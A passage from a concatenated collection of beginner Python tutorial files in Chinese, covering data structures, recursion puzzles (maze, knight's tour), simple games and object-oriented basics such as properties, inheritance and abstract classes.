return self.current raise StopIteration() @profile def eat_memory(): items = [] for _ in range(1000000): items.append(object()) return items def main(): eat_memory() # list(PrimeIter(1000)) # cProfile.run('list(PrimeIter(10000))') if __name__ == '__main__': main() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part03/example.py """ 扑克 """ import enum import random @enum.unique class Suite(enum.Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) class Card: """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): suites = '♠♥♣♦' faces = ['', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K'] return f'{suites[self.suite.value]}{faces[self.face]}' class Poker: """扑克""" def __init__(self): self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] self.current = 0 def shuffle(self): """洗牌""" self.current = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.current] self.current += 1 return card @property def has_next(self): """还有没有牌可以发""" return self.current < len(self.cards) def main(): """主函数(程序入口)""" poker = Poker() poker.shuffle() print(poker.cards) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example03.py """ 迷宫寻路 """ import random import sys WALL = -1 ROAD = 0 ROWS = 10 COLS = 10 def find_way(maze, i=0, j=0, step=1): """走迷宫""" if 0 <= i < ROWS and 0 <= j < COLS and maze[i][j] == 0: maze[i][j] = step if i == ROWS - 1 and j == COLS - 1: print('=' * 20) display(maze) sys.exit(0) find_way(maze, i + 1, j, step + 1) find_way(maze, i, j + 1, step + 1) find_way(maze, i - 1, j, step + 1) find_way(maze, i, j - 1, step + 1) maze[i][j] = ROAD def reset(maze): """重置迷宫""" for i in range(ROWS): for j in range(COLS): num = random.randint(1, 10) maze[i][j] = WALL if num > 7 else ROAD maze[0][0] = maze[ROWS - 1][COLS - 1] = ROAD def display(maze): """显示迷宫""" for row in maze: for col in row: if col == -1: print('■', end=' ') elif col == 0: print('□', end=' ') else: print(f'{col}'.ljust(2), end='') print() def main(): """主函数""" maze = [[0] * COLS for _ in range(ROWS)] reset(maze) display(maze) find_way(maze) print('没有出路!!!') if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example02.py def climb(num): a, b, c = 1, 2, 4 for _ in range(num - 1): a, b, c = b, c, a + b + c return a def main(): n = int(input('台阶数量: ')) print(climb(n)) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example01.py import sys def fac(num): if num == 0: return 1 return num * fac(num - 1) def main(): print(fac(59996)) if __name__ == '__main__': sys.setrecursionlimit(60000) main() # for i in range(1000): # print(f'{i}:'.rjust(3), fac(i)) File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example05.py size = 25 for i in range(size): for j in range(size): if i % 2 == 1 or j % 2 == 1: print('■', end='') else: print('□', end='') print() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example04.py """ 骑士巡逻 """ import sys SIZE = 8 def display(board): """显示棋盘""" for row in board: for col in row: print(f'{col}'.rjust(2, '0'), end=' ') print() def patrol(board, i=0, j=0, step=1): """巡逻""" if 0 <= i < SIZE and 0 <= j < SIZE and board[i][j] == 0: board[i][j] = step if step == SIZE * SIZE: display(board) sys.exit(0) patrol(board, i + 1, j + 2, step + 1) patrol(board, i + 2, j + 1, step + 1) patrol(board, i + 2, j - 1, step + 1) patrol(board, i + 1, j - 2, step + 1) patrol(board, i - 1, j - 2, step + 1) patrol(board, i - 2, j - 1, step + 1) patrol(board, i - 2, j + 1, step + 1) 
patrol(board, i - 1, j + 2, step + 1) board[i][j] = 0 def main(): """主函数""" board = [[0] * SIZE for _ in range(SIZE)] patrol(board) if __name__ == '__main__': main() File: Day01-15/code/Day07/lottery.py """ 双色球随机选号程序 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ from random import randrange, randint, sample def display(balls): """ 输出列表中的双色球号码 """ for index, ball in enumerate(balls): if index == len(balls) - 1: print('|', end=' ') print('%02d' % ball, end=' ') print() def random_select(): """ 随机选择一组号码 """ red_balls = [x for x in range(1, 34)] selected_balls = [] for _ in range(6): index = randrange(len(red_balls)) selected_balls.append(red_balls[index]) del red_balls[index] # 上面的for循环也可以写成下面这行代码 # sample函数是random模块下的函数 # selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def main(): n = int(input('机选几注: ')) for _ in range(n): display(random_select()) if __name__ == '__main__': main() File: Day01-15/code/Day07/marquee.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os import time def main(): str = 'Welcome to 1000 Phone Chengdu Campus ' while True: print(str) time.sleep(0.2) str = str[1:] + str[0:1] # for Windows use os.system('cls') instead os.system('clear') if __name__ == '__main__': main() File: Day01-15/code/Day07/tuple.py """ 元组的定义和使用 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): # 定义元组 t = ('骆昊', 38, True, '四川成都') print(t) # 获取元组中的元素 print(t[0]) print(t[1]) print(t[2]) print(t[3]) # 遍历元组中的值 for member in t: print(member) # 重新给元组赋值 # t[0] = '王大锤' # TypeError # 变量t重新引用了新的元组 原来的元组被垃圾回收 t = ('王大锤', 20, True, '云南昆明') print(t) # 元组和列表的转换 person = list(t) print(person) person[0] = '李小龙' person[1] = 25 print(person) fruits_list = ['apple', 'banana', 'orange'] fruits_tuple = tuple(fruits_list) print(fruits_tuple) print(fruits_tuple[1]) if __name__ == '__main__': main() File: Day01-15/code/Day07/list3.py """ 生成列表 - 用range创建数字列表 - 生成表达式 - 生成器 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ # 生成Fibonacci序列的生成器 def fib(n): a, b = 0, 1 for _ in range(n): a, b = b, a + b yield a def main(): # 用range创建数值列表 list1 = list(range(1, 11)) print(list1) # 生成表达式 list2 = [x * x for x in range(1, 11)] print(list2) list3 = [m + n for m in 'ABCDEFG' for n in '12345'] print(list3) print(len(list3)) # 生成器(节省空间但生成下一个元素时需要花费时间) gen = (m + n for m in 'ABCDEFG' for n in '12345') print(gen) for elem in gen: print(elem, end=' ') print() gen = fib(20) print(gen) for elem in gen: print(elem, end=' ') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/tic-tac-toe.py """ 井字棋游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os def print_board(board): print(board['TL'] + '|' + board['TM'] + '|' + board['TR']) print('-+-+-') print(board['ML'] + '|' + board['MM'] + '|' + board['MR']) print('-+-+-') print(board['BL'] + '|' + board['BM'] + '|' + board['BR']) def main(): init_board = { 'TL': ' ', 'TM': ' ', 'TR': ' ', 'ML': ' ', 'MM': ' ', 'MR': ' ', 'BL': ' ', 'BM': ' ', 'BR': ' ' } begin = True while begin: curr_board = init_board.copy() begin = False turn = 'x' counter = 0 os.system('clear') print_board(curr_board) while counter < 9: move = input('轮到%s走棋, 请输入位置: ' % turn) if curr_board[move] == ' ': counter += 1 curr_board[move] = turn if turn == 'x': turn = 'o' else: turn = 'x' os.system('clear') print_board(curr_board) choice = input('再玩一局?(yes|no)') begin = choice == 'yes' if __name__ == '__main__': main() File: Day01-15/code/Day07/avgscore.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ 
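# A minimal sketch of a more idiomatic alternative: the average that main() below
# accumulates by hand can also be computed with the built-ins sum() and len().
# The helper name `average` is illustrative only and is not used by main().
def average(scores):
    """Return the arithmetic mean of a non-empty sequence of scores."""
    return sum(scores) / len(scores)
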
def main(): number = int(input('请输入学生人数: ')) names = [None] * number scores = [None] * number for index in range(len(names)): names[index] = input('请输入第%d个学生的名字: ' % (index + 1)) scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1))) total = 0 for index in range(len(names)): print('%s: %.1f分' % (names[index], scores[index])) total += scores[index] print('平均成绩是: %.1f分' % (total / number)) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict1.py """ 定义和使用字典 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): scores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82} print(scores['骆昊']) print(scores['狄仁杰']) for elem in scores: print('%s\t--->\t%d' % (elem, scores[elem])) scores['白元芳'] = 65 scores['诸葛王朗'] = 71 scores.update(冷面=67, 方启鹤=85) print(scores) if '武则天' in scores: print(scores['武则天']) print(scores.get('武则天')) print(scores.get('武则天', 60)) print(scores.popitem()) print(scores.popitem()) print(scores.pop('骆昊', 100)) scores.clear() print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day07/set1.py """ 定义和使用集合 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = {1, 2, 3, 3, 3, 2} print(set1) print('Length =', len(set1)) set2 = set(range(1, 10)) print(set2) set1.add(4) set1.add(5) set2.update([11, 12]) print(set1) print(set2) set2.discard(5) # remove的元素如果不存在会引发KeyError if 4 in set2: set2.remove(4) print(set2) # 遍历集合容器 for elem in set2: print(elem ** 2, end=' ') print() # 将元组转换成集合 set3 = set((1, 2, 3, 3, 2, 1)) print(set3.pop()) print(set3) if __name__ == '__main__': main() File: Day01-15/code/Day07/list2.py """ 列表常用操作 - 列表连接 - 获取长度 - 遍历列表 - 列表切片 - 列表排序 - 列表反转 - 查找元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry'] fruits += ['pitaya', 'pear', 'mango'] # 循环遍历列表元素 for fruit in fruits: print(fruit.title(), end=' ') print() # 列表切片 fruits2 = fruits[1:4] print(fruits2) # fruit3 = fruits # 没有复制列表只创建了新的引用 fruits3 = fruits[:] print(fruits3) fruits4 = fruits[-3:-1] print(fruits4) fruits5 = fruits[::-1] print(fruits5) if __name__ == '__main__': main() File: Day01-15/code/Day07/set2.py """ 集合的常用操作 - 交集 - 并集 - 差集 - 子集 - 超集 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = set(range(1, 7)) print(set1) set2 = set(range(2, 11, 2)) print(set2) set3 = set(range(1, 5)) print(set1 & set2) # print(set1.intersection(set2)) print(set1 | set2) # print(set1.union(set2)) print(set1 - set2) # print(set1.difference(set2)) print(set1 ^ set2) # print(set1.symmetric_difference(set2)) print(set2 <= set1) # print(set2.issubset(set1)) print(set3 <= set1) # print(set3.issubset(set1)) print(set1 >= set2) # print(set1.issuperset(set2)) print(set1 >= set3) # print(set1.issuperset(set3)) if __name__ == '__main__': main() File: Day01-15/code/Day07/findmax.py """ 找出列表中最大或最小的元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry', 'pitaya'] # 直接使用内置的max和min函数找出列表中最大和最小元素 # print(max(fruits)) # print(min(fruits)) max_value = min_value = fruits[0] for index in range(1, len(fruits)): if fruits[index] > max_value: max_value = fruits[index] elif fruits[index] < min_value: min_value = fruits[index] print('Max:', max_value) print('Min:', min_value) if __name__ == '__main__': main() # 想一想如果最大的元素有两个要找出第二大的又该怎么做 File: Day01-15/code/Day07/list1.py """ 定义和使用列表 - 用下标访问元素 - 添加元素 - 删除元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', '@pple', 'strawberry', 'waxberry'] print(fruits) # 通过下标访问元素 print(fruits[0]) print(fruits[1]) print(fruits[-1]) 
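    # negative indexes count from the end of the list: -1 is the last element and -2 the second-to-last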
print(fruits[-2]) # print(fruits[-5]) # IndexError # print(fruits[4]) # IndexError fruits[1] = 'apple' print(fruits) # 添加元素 fruits.append('pitaya') fruits.insert(0, 'banana') print(fruits) # 删除元素 del fruits[1] fruits.pop() fruits.pop(0) fruits.remove('apple') print(fruits) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict2.py """ 字典的常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): stu = {'name': '骆昊', 'age': 38, 'gender': True} print(stu) print(stu.keys()) print(stu.values()) print(stu.items()) for elem in stu.items(): print(elem) print(elem[0], elem[1]) if 'age' in stu: stu['age'] = 20 print(stu) stu.setdefault('score', 60) print(stu) stu.setdefault('score', 100) print(stu) stu['score'] = 100 print(stu) if __name__ == '__main__': main() File: Day01-15/code/Day07/yanghui.py """ 输出10行的杨辉三角 - 二项式的n次方展开系数 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 ... ... ... Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): num = int(input('Number of rows: ')) yh = [[]] * num for row in range(len(yh)): yh[row] = [None] * (row + 1) for col in range(len(yh[row])): if col == 0 or col == row: yh[row][col] = 1 else: yh[row][col] = yh[row - 1][col] + yh[row - 1][col - 1] print(yh[row][col], end='\t') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/fibonacci.py """ 生成斐波拉切数列 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): f = [1 , 1] for i in range(2, 20): f += [f[i - 1] + f[i - 2]] # f.append(f[i - 1] + f[i - 2]) for val in f: print(val, end=' ') if __name__ == '__main__': main() File: Day01-15/code/Day07/scoretable.py """ 学生考试成绩表 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): names = ['关羽', '张飞', '赵云', '马超', '黄忠'] subjs = ['语文', '数学', '英语'] scores = [[0] * 3] * 5 for row, name in enumerate(names): print('请输入%s的成绩' % name) for col, subj in enumerate(subjs): scores[row][col] = float(input(subj + ': ')) print(scores) # for row, name in enumerate(names): # print('请输入%s的成绩' % name) # scores[row] = [None] * len(subjs) # for col, subj in enumerate(subjs): # score = float(input(subj + ': ')) # scores[row][col] = score # print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day09/rational.py """ 运算符重载 - 自定义分数类 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import gcd class Rational(object): def __init__(self, num, den=1): if den == 0: raise ValueError('分母不能为0') self._num = num self._den = den self.normalize() def simplify(self): x = abs(self._num) y = abs(self._den) factor = gcd(x, y) if factor > 1: self._num //= factor self._den //= factor return self def normalize(self): if self._den < 0: self._den = -self._den self._num = -self._num return self def __add__(self, other): new_num = self._num * other._den + other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __sub__(self, other): new_num = self._num * other._den - other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __mul__(self, other): new_num = self._num * other._num new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __truediv__(self, other): new_num = self._num * other._den new_den = self._den * other._num return Rational(new_num, new_den).simplify().normalize() def __str__(self): if self._num == 0: return '0' elif self._den == 1: return str(self._num) else: return '(%d/%d)' % (self._num, self._den) if __name__ == '__main__': r1 = Rational(2, 3) print(r1) r2 = Rational(6, -8) print(r2) print(r2.simplify()) print('%s + 
%s = %s' % (r1, r2, r1 + r2)) print('%s - %s = %s' % (r1, r2, r1 - r2)) print('%s * %s = %s' % (r1, r2, r1 * r2)) print('%s / %s = %s' % (r1, r2, r1 / r2)) File: Day01-15/code/Day09/pet.py from abc import ABCMeta, abstractmethod class Pet(object, metaclass=ABCMeta): def __init__(self, nickname): self._nickname = nickname @abstractmethod def make_voice(self): pass class Dog(Pet): def make_voice(self): print('%s: 汪汪汪...' % self._nickname) class Cat(Pet): def make_voice(self): print('%s: 喵...喵...' % self._nickname) def main(): pets = [Dog('旺财'), Cat('凯蒂'), Dog('大黄')] for pet in pets: pet.make_voice() if __name__ == '__main__': main() File: Day01-15/code/Day09/diamond.py """ 多重继承 - 菱形继承(钻石继承) - C3算法(替代DFS的算法) Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class A(object): def foo(self): print('foo of A') class B(A): pass class C(A): def foo(self): print('foo fo C') class D(B, C): pass class E(D): def foo(self): print('foo in E') super().foo() super(B, self).foo() super(C, self).foo() if __name__ == '__main__': d = D() d.foo() e = E() e.foo() File: Day01-15/code/Day09/clock.py from time import time, localtime, sleep class Clock(object): """数字时钟""" def __init__(self, hour=0, minute=0, second=0): self._hour = hour self._minute = minute self._second = second @classmethod def now(cls): ctime = localtime(time()) return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec) def run(self): """走字""" self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): """显示时间""" return '%02d:%02d:%02d' % \ (self._hour, self._minute, self._second) def main(): clock = Clock.now() while True: print(clock.show()) sleep(1) clock.run() if __name__ == '__main__': main() File: Day01-15/code/Day09/car1.py """ 属性的使用 - 访问器/修改器/删除器 - 使用__slots__对属性加以限制 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): __slots__ = ('_brand', '_max_speed') def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed @property def brand(self): return self._brand @brand.setter def brand(self, brand): self._brand = brand @brand.deleter def brand(self): del self._brand @property def max_speed(self): return self._max_speed @max_speed.setter def max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" # 使用__slots__属性限制后下面的代码将产生异常 # car.current_speed = 80 print(car) # 如果提供了删除器可以执行下面的代码 # del car.brand # 属性的实现 print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) print(Car.brand.fdel) # 通过上面的代码帮助学生理解之前提到的包装器的概念 # Python中有很多类似的语法糖后面还会出现这样的东西 File: Day01-15/code/Day09/multi.py """ 多重继承 - 通过多重继承可以给一个类的对象具备多方面的能力 - 这样在设计类的时候可以避免设计太多层次的复杂的继承关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Father(object): def __init__(self, name): self._name = name def gamble(self): print('%s在打麻将.' % self._name) def eat(self): print('%s在大吃大喝.' % self._name) class Monk(object): def __init__(self, name): self._name = name def eat(self): print('%s在吃斋.' % self._name) def chant(self): print('%s在念经.' % self._name) class Musician(object): def __init__(self, name): self._name = name def eat(self): print('%s在细嚼慢咽.' % self._name) def play_piano(self): print('%s在弹钢琴.' 
% self._name) # 试一试下面的代码看看有什么区别 # class Son(Monk, Father, Musician): # class Son(Musician, Father, Monk): class Son(Father, Monk, Musician): def __init__(self, name): Father.__init__(self, name) Monk.__init__(self, name) Musician.__init__(self, name) son = Son('王大锤') son.gamble() # 调用继承自Father的eat方法 son.eat() son.chant() son.play_piano() File: Day01-15/code/Day09/association.py """ 对象之间的关联关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Point(object): def __init__(self, x=0, y=0): self._x = x self._y = y def move_to(self, x, y): self._x = x self._y = y def move_by(self, dx, dy): self._x += dx self._y += dy def distance_to(self, other): dx = self._x - other._x dy = self._y - other._y return sqrt(dx ** 2 + dy ** 2) def __str__(self): return '(%s, %s)' % (str(self._x), str(self._y)) class Line(object): def __init__(self, start=Point(0, 0), end=Point(0, 0)): self._start = start self._end = end @property def start(self): return self._start @start.setter def start(self, start): self._start = start @property def end(self): return self.end @end.setter def end(self, end): self._end = end @property def length(self): return self._start.distance_to(self._end) if __name__ == '__main__': p1 = Point(3, 5) print(p1) p2 = Point(-2, -1.5) print(p2) line = Line(p1, p2) print(line.length) line.start.move_to(2, 1) line.end = Point(1, 2) print(line.length) File: Day01-15/code/Day09/dependency.py """ 对象之间的依赖关系和运算符重载 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed self._current_speed = 0 @property def brand(self): return self._brand def accelerate(self, delta): self._current_speed += delta if self._current_speed > self._max_speed: self._current_speed = self._max_speed def brake(self): self._current_speed = 0 def __str__(self): return '%s当前时速%d' % (self._brand, self._current_speed) class Student(object): def __init__(self, name, age): self._name = name self._age = age @property def name(self): return self._name # 学生和车之间存在依赖关系 - 学生使用了汽车 def drive(self, car): print('%s驾驶着%s欢快的行驶在去西天的路上' % (self._name, car._brand)) car.accelerate(30) print(car) car.accelerate(50) print(car) car.accelerate(50) print(car) def study(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def watch_av(self): if self._age < 18: print('%s只能观看《熊出没》.' % self._name) else: print('%s正在观看岛国爱情动作片.' 
% self._name) # 重载大于(>)运算符 def __gt__(self, other): return self._age > other._age # 重载小于(<)运算符 def __lt__(self, other): return self._age < other._age if __name__ == '__main__': stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() car = Car('QQ', 120) stu2.drive(car) print(stu1 > stu2) print(stu1 < stu2) File: Day01-15/code/Day09/triangle.py """ 实例方法和类方法的应用 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Triangle(object): def __init__(self, a, b, c): self._a = a self._b = b self._c = c # 静态方法 @staticmethod def is_valid(a, b, c): return a + b > c and b + c > a and c + a > b # 实例方法 def perimeter(self): return self._a + self._b + self._c # 实例方法 def area(self): p = self.perimeter() / 2 return sqrt(p * (p - self._a) * (p - self._b) * (p - self._c)) if __name__ == '__main__': # 用字符串的split方法将字符串拆分成一个列表 # 再通过map函数对列表中的每个字符串进行映射处理成小数 a, b, c = map(float, input('请输入三条边: ').split()) # 先判断给定长度的三条边能否构成三角形 # 如果能才创建三角形对象 if Triangle.is_valid(a, b, c): tri = Triangle(a, b, c) print('周长:', tri.perimeter()) print('面积:', tri.area()) # 如果传入对象作为方法参数也可以通过类调用实例方法 # print('周长:', Triangle.perimeter(tri)) # print('面积:', Triangle.area(tri)) # 看看下面的代码就知道其实二者本质上是一致的 # print(type(tri.perimeter)) # print(type(Triangle.perimeter)) else: print('不能构成三角形.') File: Day01-15/code/Day09/employee.py """ 抽象类 / 方法重写 / 多态 实现一个工资结算系统 公司有三种类型的员工 - 部门经理固定月薪12000元/月 - 程序员按本月工作小时数每小时100元 - 销售员1500元/月的底薪加上本月销售额5%的提成 输入员工的信息 输出每位员工的月薪信息 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod class Employee(object, metaclass=ABCMeta): def __init__(self, name): self._name = name @property def name(self): return self._name @abstractmethod def get_salary(self): pass class Manager(Employee): # 想一想: 如果不定义构造方法会怎么样 def __init__(self, name): # 想一想: 如果不调用父类构造器会怎么样 super().__init__(name) def get_salary(self): return 12000 class Programmer(Employee): def __init__(self, name): super().__init__(name) def set_working_hour(self, working_hour): self._working_hour = working_hour def get_salary(self): return 100 * self._working_hour class Salesman(Employee): def __init__(self, name): super().__init__(name) def set_sales(self, sales): self._sales = sales def get_salary(self): return 1500 + self._sales * 0.05 if __name__ == '__main__': emps = [Manager('武则天'), Programmer('狄仁杰'), Salesman('白元芳')] for emp in emps: if isinstance(emp, Programmer): working_hour = int(input('请输入%s本月工作时间: ' % emp.name)) emp.set_working_hour(working_hour) elif isinstance(emp, Salesman): sales = float(input('请输入%s本月销售额: ' % emp.name)) emp.set_sales(sales) print('%s本月月薪为: ¥%.2f元' % (emp.name, emp.get_salary())) File: Day01-15/code/Day09/car2.py """ 属性的使用 - 使用已有方法定义访问器/修改器/删除器 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self.set_brand(brand) self.set_max_speed(max_speed) def get_brand(self): return self._brand def set_brand(self, brand): self._brand = brand def get_max_speed(self): return self._max_speed def set_max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) # 用已有的修改器和访问器定义属性 brand = property(get_brand, set_brand) max_speed = property(get_max_speed, set_max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" print(car) print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) File: 
Day01-15/code/Day09/shape.py """ 继承的应用 - 抽象类 - 抽象方法 - 方法重写 - 多态 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod from math import pi class Shape(object, metaclass=ABCMeta): @abstractmethod def perimeter(self): pass @abstractmethod def area(self): pass class Circle(Shape): def __init__(self, radius): self._radius = radius def perimeter(self): return 2 * pi * self._radius def area(self): return pi * self._radius ** 2 def __str__(self): return '我是一个圆' class Rect(Shape): def __init__(self, width, height): self._width = width self._height = height def perimeter(self): return 2 * (self._width + self._height) def area(self): return self._width * self._height def __str__(self): return '我是一个矩形' if __name__ == '__main__': shapes = [Circle(5), Circle(3.2), Rect(3.2, 6.3)] for shape in shapes: print(shape) print('周长:', shape.perimeter()) print('面积:', shape.area()) File: Day01-15/code/Day08/circle.py """ 练习 修一个游泳池 半径(以米为单位)在程序运行时输入 游泳池外修一条3米宽的过道 过道的外侧修一圈围墙 已知过道的造价为25元每平米 围墙的造价为32.5元每米 输出围墙和过道的总造价分别是多少钱(精确到小数点后2位) Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import math class Circle(object): def __init__(self, radius): self._radius = radius @property def radius(self): return self._radius @radius.setter def radius(self, radius): self._radius = radius if radius > 0 else 0 @property def perimeter(self): return 2 * math.pi * self._radius @property def area(self): return math.pi * self._radius * self._radius if __name__ == '__main__': radius = float(input('请输入游泳池的半径: ')) small = Circle(radius) big = Circle(radius + 3) print('围墙的造价为: ¥%.1f元' % (big.perimeter * 115)) print('过道的造价为: ¥%.1f元' % ((big.area - small.area) * 65)) File: Day01-15/code/Day08/guess.py """ 面向对象版本的猜数字游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ from random import randint class GuessMachine(object): def __init__(self): self._answer = None self._counter = None self._hint = None def reset(self): self._answer = randint(1, 100) self._counter = 0 self._hint = None def guess(self, your_answer): self._counter += 1 if your_answer > self._answer: self._hint = '小一点' elif your_answer < self._answer: self._hint = '大一点' else: self._hint = '恭喜你猜对了' return True return False @property def counter(self): return self._counter @property def hint(self): return self._hint if __name__ == '__main__': gm = GuessMachine() play_again = True while play_again: game_over = False gm.reset() while not game_over: your_answer = int(input('请输入: ')) game_over = gm.guess(your_answer) print(gm.hint) if gm.counter > 7: print('智商余额不足!') play_again = input('再玩一次?(yes|no)') == 'yes' File: Day01-15/code/Day08/hack.py """ 另一种创建类的方式 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def bar(self, name): self._name = name def foo(self, course_name): print('%s正在学习%s.' 
% (self._name, course_name)) def main(): Student = type('Student', (object,), dict(__init__=bar, study=foo)) stu1 = Student('骆昊') stu1.study('Python程序设计') if __name__ == '__main__': main() File: Day01-15/code/Day08/clock.py """ 定义和使用时钟类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import time import os class Clock(object): # Python中的函数是没有重载的概念的 # 因为Python中函数的参数没有类型而且支持缺省参数和可变参数 # 用关键字参数让构造器可以传入任意多个参数来实现其他语言中的构造器重载 def __init__(self, **kw): if 'hour' in kw and 'minute' in kw and 'second' in kw: self._hour = kw['hour'] self._minute = kw['minute'] self._second = kw['second'] else: tm = time.localtime(time.time()) self._hour = tm.tm_hour self._minute = tm.tm_min self._second = tm.tm_sec def run(self): self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): return '%02d:%02d:%02d' % (self._hour, self._minute, self._second) if __name__ == '__main__': # clock = Clock(hour=10, minute=5, second=58) clock = Clock() while True: os.system('clear') print(clock.show()) time.sleep(1) clock.run() File: Day01-15/code/Day08/access.py class Test: def __init__(self, foo): self.__foo = foo def __bar(self): print(self.__foo) print('__bar') def main(): test = Test('hello') test._Test__bar() print(test._Test__foo) if __name__ == "__main__": main() File: Day01-15/code/Day08/rect.py """ 定义和使用矩形类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ class Rect(object): """矩形类""" def __init__(self, width=0, height=0): """初始化方法""" self.__width = width self.__height = height def perimeter(self): """计算周长""" return (self.__width + self.__height) * 2 def area(self): """计算面积""" return self.__width * self.__height def __str__(self): """矩形对象的字符串表达式""" return '矩形[%f,%f]' % (self.__width, self.__height) def __del__(self): """析构器""" print('销毁矩形对象') if __name__ == '__main__': rect1 = Rect() print(rect1) print(rect1.perimeter()) print(rect1.area()) rect2 = Rect(3.5, 4.5) print(rect2) print(rect2.perimeter()) print(rect2.area()) File: Day01-15/code/Day08/student.py """ 定义和使用学生类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def _foo(): print('test') class Student(object): # __init__是一个特殊方法用于在创建对象时进行初始化操作 # 通过这个方法我们可以为学生对象绑定name和age两个属性 def __init__(self, name, age): self.name = name self.age = age def study(self, course_name): print('%s正在学习%s.' % (self.name, course_name)) # PEP 8要求标识符的名字用全小写多个单词用下划线连接 # 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识) def watch_av(self): if self.age < 18: print('%s只能观看《熊出没》.' % self.name) else: print('%s正在观看岛国大电影.' 
